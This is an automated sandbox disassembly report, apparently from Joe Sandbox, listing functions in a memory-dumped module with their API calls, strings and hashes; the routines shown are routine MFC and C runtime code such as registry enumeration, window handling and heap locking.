Opcode ID: 1382ac08b69fac21d679d0a1a49e8ab5d0ed8680a2546323c0cf7c79d957ac90
Instruction ID: 23affb0f8cfccba515895f63010ff39bd129906dee1037deeb32135f2bae0d11
Opcode Fuzzy Hash: 1382ac08b69fac21d679d0a1a49e8ab5d0ed8680a2546323c0cf7c79d957ac90
Instruction Fuzzy Hash: E921D371665230AFDF108F188CC4B5B7BB9EF467A0F114126FD1C9B681E6B0D840CBA1

Function 6C53A200 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C53A20A
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6C53A2F0
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6C53A30D
RegCloseKey.ADVAPI32(?), ref: 6C53A32D
RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6C53A348

Strings

Software\, xrefs: 6C53A26E

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 0debee371e536e0baf6e5031f52e484a55b2c0120f916265403e95e6141c142d
Instruction ID: 11fde7b9123a5468bdc7e56284737536bc7e7e82c122b6ba25b0ba3d637dc2f6
Opcode Fuzzy Hash: 0debee371e536e0baf6e5031f52e484a55b2c0120f916265403e95e6141c142d
Instruction Fuzzy Hash: B3419231901528EBCF21DBE4DC88ADEB7B9AF89318F5416D9E009E2650EB349F84CF55

Function 6C541861 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6C541868
GetPropW.USER32(?,AfxOldWndProc423), ref: 6C541877
RemovePropW.USER32(?,AfxOldWndProc423), ref: 6C541900
GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6C541907
GlobalDeleteAtom.KERNEL32(?), ref: 6C541911

Part of subcall function 6C540C2C: GetWindowRect.USER32(?,10000000), ref: 6C540C56

Strings

AfxOldWndProc423, xrefs: 6C541870, 6C541875, 6C5418FE, 6C541906

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: AtomGlobalProp$DeleteFindH_prolog3_catchRectRemoveWindow
String ID: AfxOldWndProc423
API String ID: 1599575004-1060338832
Opcode ID: 4b63f4f23f6cbedb03ba6245ce9a9d5d7f6f6edc97f09eeb2a3f1e72ff4f8ae3
Instruction ID: f0c10c98e56790bc9c3f59dc18c1c0b9ee43ae9a82a0155103993f669cf677e6
Opcode Fuzzy Hash: 4b63f4f23f6cbedb03ba6245ce9a9d5d7f6f6edc97f09eeb2a3f1e72ff4f8ae3
Instruction Fuzzy Hash: D3319A3244125AEBCF019FE0CC49EFF7BB8AF8A316F50841AF601A2950C735CD259BA5

Function 6C53A082 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6C53A08C
RegOpenKeyW.ADVAPI32(?,?,?), ref: 6C53A11A
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6C53A13D

Part of subcall function 6C53A02D: __EH_prolog3.LIBCMT ref: 6C53A034

Strings

Software\Classes\, xrefs: 6C53A0CD

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: EnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 3518408925-1121929649
Opcode ID: 34be3b0bfe0354fa2c82acb861b0042a5f92d9a16fded7e120d2aa30cf550f6e
Instruction ID: abfc65e4ae8c9420caf68babcd070a91467aa14b05184e2e6d117cc5a7a576fc
Opcode Fuzzy Hash: 34be3b0bfe0354fa2c82acb861b0042a5f92d9a16fded7e120d2aa30cf550f6e
Instruction Fuzzy Hash: 76316E31C40138EACF21ABE4DC48BDDB7B4AF49314F5412D5E85963691EB709F889F61

Function 6C53D07E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6C53D0AE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C53D0D1
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C53D0ED
RegCloseKey.ADVAPI32(?), ref: 6C53D0FD
RegCloseKey.ADVAPI32(?), ref: 6C53D107

Strings

software, xrefs: 6C53D096

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 56f6a3d344bcc24d10678d78738d6c69a8b368b2189cfe5c6b8a394890ecff36
Instruction ID: 467e8426b8987cf57056171bf8b43de841122fe61a06e38177fc768d0fc4082b
Opcode Fuzzy Hash: 56f6a3d344bcc24d10678d78738d6c69a8b368b2189cfe5c6b8a394890ecff36
Instruction Fuzzy Hash: D911F872D00118FBCB21DA9ACD88DDFBFBDEFC9754B5140AAF504A2121E7319A01DBA1

Function 6C53BEAE Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL(?), ref: 6C53BEB5
__CxxThrowException@8.LIBCMT ref: 6C53BEBF

Part of subcall function 6C54527B: RaiseException.KERNEL32(?,00000000,?,00000001), ref: 6C5452BD

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6C53AF00,6C536DDD,6C5368AD,?,6C544902,?), ref: 6C53BED6
RtlLeaveCriticalSection.NTDLL(?), ref: 6C53BEE3

Part of subcall function 6C536D89: __CxxThrowException@8.LIBCMT ref: 6C536D9F

_memset.LIBCMT ref: 6C53BF02
TlsSetValue.KERNEL32(?,00000000), ref: 6C53BF13
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C53BF34

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 7366edf639ce011be1140403e57711d260c7e178339819381542d0ab014f2fe8
Instruction ID: 9a4d4f02684ebc6ecf6fe2a7c74459741278c82cb0139ea04093946cb2ec7974
Opcode Fuzzy Hash: 7366edf639ce011be1140403e57711d260c7e178339819381542d0ab014f2fe8
Instruction Fuzzy Hash: 34118E74200A05EFDB10EF64CC8AC6ABBB5FF45318790D52AE65996A20DB30EC54CF50

Function 6C54FE0E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6C54FE1A

Part of subcall function 6C54A27F: __getptd_noexit.LIBCMT ref: 6C54A282
Part of subcall function 6C54A27F: __amsg_exit.LIBCMT ref: 6C54A28F

__amsg_exit.LIBCMT ref: 6C54FE3A
__lock.LIBCMT ref: 6C54FE4A
InterlockedDecrement.KERNEL32(?), ref: 6C54FE67
InterlockedIncrement.KERNEL32(02AB28E0), ref: 6C54FE92

Strings

$Vl, xrefs: 6C54FE71

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID: $Vl
API String ID: 4271482742-383207871
Opcode ID: ef9c6c2e6e11b9d827e26fac3d83b8da40c49b68bec12e94979a6ac0d66069c6
Instruction ID: 27e9dfba45604a8127917aa4289ac41d8dc63c6a841a1f194190b314fb104882
Opcode Fuzzy Hash: ef9c6c2e6e11b9d827e26fac3d83b8da40c49b68bec12e94979a6ac0d66069c6
Instruction Fuzzy Hash: 5301D632A02711DBDB519F6E8C08B9E73B0AF4572AF518309E41067F91C734A951CBD5

Function 6C53CA77 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000000), ref: 6C53CA85
SetErrorMode.KERNEL32(00000000), ref: 6C53CA8D

Part of subcall function 6C53A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C53A6D0
Part of subcall function 6C53A698: SetLastError.KERNEL32(0000006F), ref: 6C53A6E7

GetModuleHandleW.KERNEL32(user32.dll), ref: 6C53CADC
GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6C53CAEC

Strings

user32.dll, xrefs: 6C53CAD7
NotifyWinEvent, xrefs: 6C53CAE6

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: Error$ModeModule$AddressFileHandleLastNameProc
String ID: NotifyWinEvent$user32.dll
API String ID: 1146408833-597752486
Opcode ID: 2871eb01197d5da2c8d6b04f48c8d5fdcd87d232b05f76f5f1beb603fd41ed76
Instruction ID: c276d267b8181dde6488a12163a9eb766ef649d985b2bb755c657610a9755d08
Opcode Fuzzy Hash: 2871eb01197d5da2c8d6b04f48c8d5fdcd87d232b05f76f5f1beb603fd41ed76
Instruction Fuzzy Hash: 9201A7716502349FCB10EFA5CC04A9A3BA8DF85314B06945AF94DD7B91EF34D844CF66

Function 6C53CD20 Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 6C53CD2E
GetSysColor.USER32(00000010), ref: 6C53CD35
GetSysColor.USER32(00000014), ref: 6C53CD3C
GetSysColor.USER32(00000012), ref: 6C53CD43
GetSysColor.USER32(00000006), ref: 6C53CD4A
GetSysColorBrush.USER32(0000000F), ref: 6C53CD57
GetSysColorBrush.USER32(00000006), ref: 6C53CD5E

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: be6e616ada33f16b48445556dd70e6e86789c5b354a7fad5b4fddf48c7df363e
Instruction ID: c634cd31302e619ae670cf536f4ce03265041aa1eb73626da84c20a6cd52fb1b
Opcode Fuzzy Hash: be6e616ada33f16b48445556dd70e6e86789c5b354a7fad5b4fddf48c7df363e
Instruction Fuzzy Hash: 5AF0FE71A407445BDB30BB724D09B47BAE1FFC4710F16092EE2458B990D6B6E441DF44

Function 6C54C416 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6C54C43E

Part of subcall function 6C544FC4: __getptd.LIBCMT ref: 6C544FD2
Part of subcall function 6C544FC4: __getptd.LIBCMT ref: 6C544FE0

__getptd.LIBCMT ref: 6C54C448

Part of subcall function 6C54A27F: __getptd_noexit.LIBCMT ref: 6C54A282
Part of subcall function 6C54A27F: __amsg_exit.LIBCMT ref: 6C54A28F

__getptd.LIBCMT ref: 6C54C456
__getptd.LIBCMT ref: 6C54C464
__getptd.LIBCMT ref: 6C54C46F
_CallCatchBlock2.LIBCMT ref: 6C54C495

Part of subcall function 6C545069: __CallSettingFrame@12.LIBCMT ref: 6C5450B5

Part of subcall function 6C54C53C: __getptd.LIBCMT ref: 6C54C54B
Part of subcall function 6C54C53C: __getptd.LIBCMT ref: 6C54C559

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 8cbb90a18d37397dd3d3c3d9a24512fa406221f19c5193d90477cfb50472586d
Instruction ID: a53667f277d6f6f9c109967ce4db0024177b42509d7e5e416289141976f1aecb
Opcode Fuzzy Hash: 8cbb90a18d37397dd3d3c3d9a24512fa406221f19c5193d90477cfb50472586d
Instruction Fuzzy Hash: 1711F675C04209DFDF01DFA4C844ADD7BB1FF44314F508469E814A7751EB399A199F50

Function 6C542932 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C542962

Strings

@, xrefs: 6C542B07
AfxMDIFrame90su, xrefs: 6C542A03
AfxFrameOrView90su, xrefs: 6C542A28
@, xrefs: 6C542A6E

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
API String ID: 2102423945-1093365818
Opcode ID: 7c6193ff2b244424b44529b8ac17450fc49f2dafa299fe1537a90038cb56efcf
Instruction ID: 08f8d95f069cdad698e46cd47d1dd3c21eec15434bf107804d8e3f8488c24130
Opcode Fuzzy Hash: 7c6193ff2b244424b44529b8ac17450fc49f2dafa299fe1537a90038cb56efcf
Instruction Fuzzy Hash: 56910171D01259AEDB40DF94CD85BDEBBF8AF84348F21C16AED19E6680E7748A44C7A0

Function 6C54140F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C53C220: RtlEnterCriticalSection.NTDLL(6C5634A8), ref: 6C53C25A
Part of subcall function 6C53C220: RtlInitializeCriticalSection.NTDLL(?), ref: 6C53C26C
Part of subcall function 6C53C220: RtlLeaveCriticalSection.NTDLL(6C5634A8), ref: 6C53C279
Part of subcall function 6C53C220: RtlEnterCriticalSection.NTDLL(?), ref: 6C53C289

Part of subcall function 6C53BB0C: __EH_prolog3_catch.LIBCMT ref: 6C53BB13

Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4

GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6C541458
FreeLibrary.KERNEL32(?), ref: 6C541468

Strings

(QVl, xrefs: 6C541421
hhctrl.ocx, xrefs: 6C54143C
HtmlHelpW, xrefs: 6C541452

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: (QVl$HtmlHelpW$hhctrl.ocx
API String ID: 2853499158-2302030225
Opcode ID: 96c24ccac308b219edc3d8c0788782dfb3a8bdd88d11b9eb9234a78a995f0f46
Instruction ID: 85119a63be9b4d897540b76b0cef17d6b6325de34811450af5bd5650cebd1450
Opcode Fuzzy Hash: 96c24ccac308b219edc3d8c0788782dfb3a8bdd88d11b9eb9234a78a995f0f46
Instruction Fuzzy Hash: 2201D131140726EBCB216BA6CD04B8B3BE0AF40358F40C91AF49F95D50EB70D8609B25

Function 6C54C165 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6C54C17F

Part of subcall function 6C54A27F: __getptd_noexit.LIBCMT ref: 6C54A282
Part of subcall function 6C54A27F: __amsg_exit.LIBCMT ref: 6C54A28F

__getptd.LIBCMT ref: 6C54C190
__getptd.LIBCMT ref: 6C54C19E

Strings

MOC, xrefs: 6C54C171
csm, xrefs: 6C54C178

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
Instruction ID: 74b470b0dc5327f5f3a3d5f050ac32c8c95c89e5c4768357e4165fcf4d1902a3
Opcode Fuzzy Hash: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
Instruction Fuzzy Hash: 03E04F35518204CFD740EBB4C845B5837A4FBE9318F2581B1D40CCBB61D735E948D942

Function 6C535670 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,6C5349D6,?,00000003), ref: 6C535685
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6C5356B4
GetLastError.KERNEL32 ref: 6C5356C5
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6C5356E5
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6C535709

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: 6de9409043ffa3eff2749ed297672167a7058a02fd07d3ac5e2c40d580a5cace
Instruction ID: f42d85685749dc2823f2ff0099dbf4c91432b492bc4871ce6c066a78f9031990
Opcode Fuzzy Hash: 6de9409043ffa3eff2749ed297672167a7058a02fd07d3ac5e2c40d580a5cace
Instruction Fuzzy Hash: 3411B175390305ABE620DE64CCC4F6777ADEB85744F601928F6829B281D660BC0D8675

Function 6C53815A Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6C53819B
GetParent.USER32(?), ref: 6C5381AE
GetLastActivePopup.USER32(?), ref: 6C5381BF
IsWindowEnabled.USER32(?), ref: 6C5381D3
EnableWindow.USER32(?,00000000), ref: 6C5381E6

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: ParentWindow$ActiveEnableEnabledLastPopup
String ID:
API String ID: 2630416829-0
Opcode ID: 8e98bba7c9034abbbe09b7a44675ff67542ba07f63f115fc5ccd7b7bd3314ae8
Instruction ID: 7c8f9b044678535469de7d47768863458b89a6c4f9eeff13c78793652eb5063a
Opcode Fuzzy Hash: 8e98bba7c9034abbbe09b7a44675ff67542ba07f63f115fc5ccd7b7bd3314ae8
Instruction Fuzzy Hash: 7C110A72646630ABDB1A065A8C40B5A73B86F45B58F1A1253EC1CE7A04F720DC0146D7

Function 6C53DA11 Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?), ref: 6C53DA3D
_memset.LIBCMT ref: 6C53DA5B
GetWindowTextW.USER32(00000000,?,00000100), ref: 6C53DA75
lstrcmpW.KERNEL32(?,?,?,?), ref: 6C53DA87
SetWindowTextW.USER32(00000000,?), ref: 6C53DA93

Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: 68e161e92b75328c2001c19d746ccfd187ddd1f9d586053de50e040547eda715
Instruction ID: a22fb3b6c27ac761b6d949ab31f81d090fcc58773af7878e485f08a2ed74d842
Opcode Fuzzy Hash: 68e161e92b75328c2001c19d746ccfd187ddd1f9d586053de50e040547eda715
Instruction Fuzzy Hash: F601D2B6611329A7CB00EAB4CD88DEF77BDEF85704F414466E909D3201EA30CA088BA0

Function 6C53DB5C Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 6C53DB6D
GetDlgCtrlID.USER32(00000000), ref: 6C53DB81
GetWindowRect.USER32(00000000,?), ref: 6C53DBA3
PtInRect.USER32(?,?,?), ref: 6C53DBB3
GetWindow.USER32(?,00000005), ref: 6C53DBC0

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: RectWindow$ClientCtrlScreen
String ID:
API String ID: 4072766398-0
Opcode ID: edeea795aa9d2276fbaac42343cddb5390ddcc5f95a3cad0f5d0950a23d661ed
Instruction ID: 2649b2e380c8888395d10d2346716016e7496fc9bb43d62baae665849f0474b5
Opcode Fuzzy Hash: edeea795aa9d2276fbaac42343cddb5390ddcc5f95a3cad0f5d0950a23d661ed
Instruction Fuzzy Hash: CF01AD32250129BBCF029B558C18EAE3B7CFF42351F424122F915D21A0E734D516CB99

Function 6C544618 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 6C544636

Part of subcall function 6C54A914: __mtinitlocknum.LIBCMT ref: 6C54A92A
Part of subcall function 6C54A914: __amsg_exit.LIBCMT ref: 6C54A936
Part of subcall function 6C54A914: RtlEnterCriticalSection.NTDLL(00000000), ref: 6C54A93E

___sbh_find_block.LIBCMT ref: 6C544641
___sbh_free_block.LIBCMT ref: 6C544650
